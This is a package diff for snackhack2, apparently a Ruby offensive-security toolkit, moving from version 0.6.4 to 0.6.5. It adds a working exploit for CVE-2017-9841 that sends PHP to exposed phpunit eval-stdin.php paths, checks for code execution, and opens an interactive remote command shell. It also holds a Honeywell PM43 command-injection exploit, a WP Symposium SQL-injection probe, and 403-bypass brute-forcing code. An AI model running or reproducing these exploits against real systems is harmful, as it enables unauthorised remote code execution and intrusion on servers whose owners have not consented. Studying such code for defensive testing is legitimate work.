snackhack2 0.6.4 → 0.6.5

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b44fea8c993ba9a8b7e92843709b1eb1a59580cf5dcc20096ad94b4c41adbda4
-  data.tar.gz: 775b9eb6964f2b830b9e01ce1e0cd3c37349c16a4a1569e803f4b24252972315
+  metadata.gz: cda044a6c9ae56812b5742965caa204d3e32d8fe9dee0857806cefd45d058e4e
+  data.tar.gz: 6f6b5a0c249afdd9691070f481fcaa756721d599b5bf7f1f68909a54c30211f1
 SHA512:
-  metadata.gz: f7c39179c33fb0f81e330c76283d78af4b6717d8f4cd3d8f66d1884fedaa79f7860638e5a7cfdb968447ba1649d4a61d3dc20266fd9036609882596e69a1cb9b
-  data.tar.gz: f5cd16fcd0e0d29db2f3ca8f9dba20474112c216a4433379e103193f72469ecdca10f0cfd78d9b7db5eeb760701d399935702aaec6728356f7f1373a2525f7af
+  metadata.gz: 62c3e1c33052a126536a6c3b2708f2f15acd1a4adbb2d26df1f3ad9ba639c1e55308034872391fc179736e0ad9899c3f633a3273e7217ac5a547ced717f389b9
+  data.tar.gz: 43943cb44a33159f5fdd31650e8322355882ceb46ce4049ad6e17d900e6bd74e35d83989a205f0a3379c303233ed3359c5abf774fd9fc164fceb4ca763af5e40

data/lib/snackhack2/CVE-2017-9841.rb

@@ -0,0 +1,77 @@
+# frozen_string_literal: true
+require 'net/http'
+require 'uri'
+module Snackhack2
+  class CVE20179841
+    attr_accessor :ip
+
+    def initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>")
+      @site = site
+      @payload = payload
+      @vulnerable = false
+    end
+
+    def run
+
+      paths = ["yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
+      paths.each do |path|
+      
+        uri = URI.parse(File.join(@site, path))
+        request = Net::HTTP::Post.new(uri)
+        request.body = "#{@payload}"
+
+        req_options = {
+          use_ssl: uri.scheme == "https",
+        }
+        response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
+          http.request(request)
+        end
+        # this is the MD5 Hhash of "phpunit_rce"
+        if response.body.match("6dd70f16549456495373a337e6708865")
+            @vulnerable = true
+            puts "THIS SITE IS vulnerable!"
+            return path
+        else
+          puts "The site is not vulnerable.... #{File.join(@site, path)}"
+        end
+
+      end
+    end
+    def shell
+      # if vulnerable it passes the path
+      path = self.run
+      # makes sure the site is vulnerable if it 
+      # is it will run a endless while loop
+      if @vulnerable
+        while true
+            # takes input to run on the server
+          
+            print(">")
+            input = gets.chomp
+            if input.eql?("exit")
+              exit
+            else
+              uri = URI.parse(File.join(@site, path))
+              request = Net::HTTP::Post.new(uri)
+              # takes the input ad run it on the host
+              request.body = "<?php system('#{input}'); ?>"
+
+              req_options = {
+                use_ssl: uri.scheme == "https",
+              }
+
+              response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
+                http.request(request)
+              end
+              puts response.body
+            end
+        end
+      end 
+    end
+  end
+end

data/lib/snackhack2/Honeywell_PM43.rb

@@ -1,27 +1,25 @@
-require 'httparty'
-module Snackhack2
-  class HoneywellPM43
-    # CVE-2023-3710
-    # Source: https://www.exploit-db.com/exploits/51885
-    attr_reader :command
-
-    def initialize(site, command: "ls", save_file: true)
-      @site = site
-      @command = command
-    end
-
-    def command=(c)
-      @command = c
-    end
-
-    def run
-      pp = HTTParty.post(File.join(@site, "loadfile.lp?pageid=Configure"),
-                         body: "username=x%0a#{@command}%0a&userpassword=1")
-      if pp.code == 200
-        puts pp
-      else
-        puts "[+] Status Code: #{pp.code}"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'httparty'
+module Snackhack2
+  class HoneywellPM43
+    # CVE-2023-3710
+    # Source: https://www.exploit-db.com/exploits/51885
+    attr_accessor :command
+
+    def initialize(site, command: 'ls', save_file: true)
+      @site = site
+      @command = command
+    end
+
+    def run
+      pp = HTTParty.post(File.join(@site, 'loadfile.lp?pageid=Configure'),
+                         body: "username=x%0a#{@command}%0a&userpassword=1")
+      if pp.code == 200
+        puts pp
+      else
+        puts "[+] Status Code: #{pp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/WP_Symposium.rb

@@ -1,22 +1,22 @@
-# frozen_string_literal: true
-
-module Snackhack2
-  class WPSymposium
-    # SOURCE: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2015-6522
-    # https://www.exploit-db.com/exploits/37824
-    # Reveal the MySQL version
-    def initialize(site)
-      @site = site
-    end
-
-    def run
-      wp = Snackhack2::get(File.join(@site,
-                                     '/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--'))
-      if wp.code == 200
-        puts wp.body
-      else
-        puts "[+] HTTP Code: #{wp.code}"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class WPSymposium
+    # SOURCE: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2015-6522
+    # https://www.exploit-db.com/exploits/37824
+    # Reveal the MySQL version
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      wp = Snackhack2.get(File.join(@site,
+                                    '/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--'))
+      if wp.code == 200
+        puts wp.body
+      else
+        puts "[+] HTTP Code: #{wp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/bannergrabber.rb

@@ -1,82 +1,82 @@
-# frozen_string_literal: true
-
-require 'socket'
-module Snackhack2
-  class BannerGrabber
-    attr_accessor :site, :save_file
-
-    def initialize(site, port: 443, save_file: true)
-      @site    = site
-      @port    = port
-      @headers = Snackhack2::get(@site).headers
-      @save_file = save_file
-    end
-
-    def site
-      #@site.gsub('https://', '')
-    end
-
-    def run
-      nginx
-      apache2
-      wordpress
-      headers
-    end
-
-    def nginx
-      if @headers['server'].match(/nginx/)
-        puts "[+] Server is running NGINX... Now checking if #{File.join(@site, "nginx_status")} is valid..."
-        nginx = Snackhack2::get(File.join(@site, "nginx_status"))
-        if nginx.code == 200
-          puts "Check #{@site}/nginx_status"
-        else
-          puts "Response code: #{nginx.code}"
-        end
-      end
-    end
-
-    def curl
-      servers = ''
-      cmd = `curl -s -I #{@site.gsub('https://', '')}`
-      version = cmd.split('Server: ')[1].split("\n")[0].strip
-      if @save_file
-        servers += version.to_s
-      else
-        puts "Banner: #{cmd.split('Server: ')[1].split("\n")[0]}"
-      end
-      Snackhack2::file_save(@site, "serverversion", servers) if @save_file
-    end
-
-    def apache2
-      if @headers['server'].match(/Apache/)
-        puts "[+] Server is running Apache2... Now checking #{File.join(@site, "server-status")}..."
-        apache = Snackhack2::get(File.join(@site, "server-status"))
-        if apache.code == 200
-          puts "Check #{@site}/server-status"
-        else
-          puts "[+] Response Code: #{apache.code}...\n\n"
-        end
-      else
-        puts "Apache2 is not found...\n\n"
-      end
-    end
-
-    def wordpress
-      wp = Snackhack2::get(@site).body
-      return unless wp.match(/wp-content/)
-
-      puts "[+] Wordpress found [+]\n\n\n"
-    end
-
-    def headers
-      h = Snackhack2::get(@site).headers
-      puts "[+] Server Version: #{h['server']}..."
-    end
-
-    def server
-      @headers['server']
-    end
-
-    attr_reader :site
-  end
-end
+# frozen_string_literal: true
+
+require 'socket'
+module Snackhack2
+  class BannerGrabber
+    attr_accessor :port, :site, :save_file
+
+    def initialize(port: 443, save_file: true)
+      @site    = site
+      @port    = port
+      @headers = Snackhack2.get(@site).headers
+      @save_file = save_file
+    end
+
+    def site
+      # @site.gsub('https://', '')
+    end
+
+    def run
+      nginx
+      apache2
+      wordpress
+      headers
+    end
+
+    def nginx
+      return unless @headers['server'].match(/nginx/)
+
+      puts "[+] Server is running NGINX... Now checking if #{File.join(@site, 'nginx_status')} is valid..."
+      nginx = Snackhack2.get(File.join(@site, 'nginx_status'))
+      if nginx.code == 200
+        puts "Check #{@site}/nginx_status"
+      else
+        puts "Response code: #{nginx.code}"
+      end
+    end
+
+    def curl
+      servers = ''
+      cmd = `curl -s -I #{@site.gsub('https://', '')}`
+      version = cmd.split('Server: ')[1].split("\n")[0].strip
+      if @save_file
+        servers += version.to_s
+      else
+        puts "Banner: #{cmd.split('Server: ')[1].split("\n")[0]}"
+      end
+      Snackhack2.file_save(@site, 'serverversion', servers) if @save_file
+    end
+
+    def apache2
+      if @headers['server'].match(/Apache/)
+        puts "[+] Server is running Apache2... Now checking #{File.join(@site, 'server-status')}..."
+        apache = Snackhack2.get(File.join(@site, 'server-status'))
+        if apache.code == 200
+          puts "Check #{@site}/server-status"
+        else
+          puts "[+] Response Code: #{apache.code}...\n\n"
+        end
+      else
+        puts "Apache2 is not found...\n\n"
+      end
+    end
+
+    def wordpress
+      wp = Snackhack2.get(@site).body
+      return unless wp.match(/wp-content/)
+
+      puts "[+] Wordpress found [+]\n\n\n"
+    end
+
+    def headers
+      h = Snackhack2.get(@site).headers
+      puts "[+] Server Version: #{h['server']}..."
+    end
+
+    def server
+      @headers['server']
+    end
+
+    attr_reader :site
+  end
+end

data/lib/snackhack2/bypass_403.rb

@@ -1,66 +1,68 @@
-require 'async'
-require 'httparty'
-module Snackhack2
-  class BypassHTTP
-    attr_accessor :site, :wordlist, :bypass
-
-    def initialize
-      @site     = site
-      @wordlist = File.join(__dir__, 'lists', 'directory-list-2.3-big.txt')
-      @bypass   = "//"
-    end
-
-    def forward_for
-      File.readlines(@wordlist).each do |r|
-        r = r.strip
-        Async do
-          url = File.join(@site, @bypass, r)
-          r = HTTParty.get(url, :headers => {
-                             "X-Forwarded-For": "127.0.0.1"
-                           })
-          puts url
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def web_request(bypass)
-      File.readlines(@wordlist).each do |r|
-        r = r.strip
-        Async do
-          url = File.join(@site, bypass, r)
-          r = Snackhack2::get(url)
-          puts url
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def basic
-      web_request("//")
-    end
-
-    def uppercase
-      File.readlines(@wordlist).each do |r|
-        r = r.strip.gsub(/./) { |s| s.send(%i[upcase downcase].sample) }
-        Async do
-          url = File.join(@site, r)
-          puts url
-          r = Snackhack2::get(url)
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def url_encode
-      web_request("%2e")
-    end
-
-    def dots
-      web_request("..;/")
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'async'
+require 'httparty'
+module Snackhack2
+  class BypassHTTP
+    attr_accessor :site, :wordlist, :bypass
+
+    def initialize
+      @site     = site
+      @wordlist = File.join(__dir__, 'lists', 'directory-list-2.3-big.txt')
+      @bypass   = '//'
+    end
+
+    def forward_for
+      File.readlines(@wordlist).each do |r|
+        r = r.strip
+        Async do
+          url = File.join(@site, @bypass, r)
+          r = HTTParty.get(url, headers: {
+                             "X-Forwarded-For": '127.0.0.1'
+                           })
+          puts url
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def web_request(bypass)
+      File.readlines(@wordlist).each do |r|
+        r = r.strip
+        Async do
+          url = File.join(@site, bypass, r)
+          r = Snackhack2.get(url)
+          puts url
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def basic
+      web_request('//')
+    end
+
+    def uppercase
+      File.readlines(@wordlist).each do |r|
+        r = r.strip.gsub(/./) { |s| s.send(%i[upcase downcase].sample) }
+        Async do
+          url = File.join(@site, r)
+          puts url
+          r = Snackhack2.get(url)
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def url_encode
+      web_request('%2e')
+    end
+
+    def dots
+      web_request('..;/')
+    end
+  end
+end

data/lib/snackhack2/comments.rb

@@ -1,27 +1,29 @@
-module Snackhack2
-  class Comments
-    attr_accessor :site
-
-    def initialize
-      @site = site
-    end
-
-    def run
-      c = Snackhack2::get(@site)
-
-      if c.code == 200
-        body = c.body.split("\n")
-        body.each_with_index do |l, i|
-          line = l.strip
-          if line.start_with?("<!--")
-            puts body[i].next
-          elsif line.include?("<!")
-            puts body[i].next
-          end
-        end
-      else
-        puts "Status Code: #{c.code}\n"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class Comments
+    attr_accessor :site
+
+    def initialize
+      @site = site
+    end
+
+    def run
+      c = Snackhack2.get(@site)
+
+      if c.code == 200
+        body = c.body.split("\n")
+        body.each_with_index do |l, i|
+          line = l.strip
+          if line.start_with?('<!--')
+            puts body[i].next
+          elsif line.include?('<!')
+            puts body[i].next
+          end
+        end
+      else
+        puts "Status Code: #{c.code}\n"
+      end
+    end
+  end
+end